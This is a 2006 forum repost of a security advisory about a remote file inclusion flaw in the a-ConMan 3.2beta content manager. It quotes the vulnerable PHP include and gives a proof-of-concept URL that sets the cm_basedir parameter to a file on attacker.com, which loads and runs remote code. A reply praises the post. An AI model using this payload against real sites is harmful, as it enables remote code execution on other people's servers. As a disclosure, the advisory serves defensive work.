zbeng Posted November 25, 2006 Report Share Posted November 25, 2006 ____________________ ___ ___ _________ _____/_ ___ / | \_____ | __)_ / // ~ / | | \ ___ Y / | /_______ / ______ /___|_ /_______ / / / / / .OR.IDECHO_ADV_61$2006------------------------------------------------------------------------------[ECHO_ADV_61$2006] a-ConMan <= v3.2beta Remote File Inclusion------------------------------------------------------------------------------Author : Ahmad Maulana a.k.a MatdhuleDate Found : November, 22nd 2006Location : Indonesia, Jakartaweb : Critical'>http://advisories.echo.or.id/adv/adv61-matdhule-2006.txtCritical Lvl : Highly criticalImpact : System accessWhere : From Remote---------------------------------------------------------------------------Affected software description:~~~~~~~~~~~~~~~~~~~~~~~~~~~~a-ConMan (Automated Content Management)Application : a-ConMan (Automated Content Management)version : 3.2betaURL : a-ConMan'>http://sourceforge.net/projects/a-conmana-ConMan is a flexible database solution built to categorize and manage your image and video content. Giving you the ability to automate the building and updating for any type of content specific website within seconds. Utilizing one of the most advanced---------------------------------------------------------------------------Vulnerability:~~~~~~~~~~~~~~I found vulnerability at script common.inc.php-----------------------common.inc.php----------------------....<?phpinclude_once($cm_basedir."/ez_sql.php");include_once($cm_basedir."/pg2ezsql.php");// include_once($cm_basedir."/functions.php");$ver = "3.1.1228";...----------------------------------------------------------Input passed to the "cm_basedir" parameter in common.inc.php is notproperly verified before being used. This can be exploited to executearbitrary PHP code by including files from local or externalresources.Proof Of Concept:~~~~~~~~~~~~~~~http://target.com/[a-conman_path]/php.incs/common.inc.php?cm_basedir=http://attacker.com/inject.txt?Solution:~~~~~~~- Sanitize variable $cm_basedir on common.inc.php.---------------------------------------------------------------------------Shoutz:~~~~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson ~ y3dips,the_day,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,str0ke~ bius, lapets, BlueSpy, NpR, h4ntu, thama, Fungky~ [mail]newbie_hacker@yahoogroups.com[/mail], [mail]jasakom_perjuangan@yahoogroups.com[/mail]~ Solpotcrew Comunity (#nyubicrew @ allindo.net), #e-c-h-o @irc.dal.net---------------------------------------------------------------------------Contact:~~~~ matdhule[at]gmail[dot]com-------------------------------- [ EOF ]---------------------------------- Quote Link to comment Share on other sites More sharing options...
4n4rchyl04d3r Posted December 17, 2006 Report Share Posted December 17, 2006 COOL!!!!! Quote Link to comment Share on other sites More sharing options...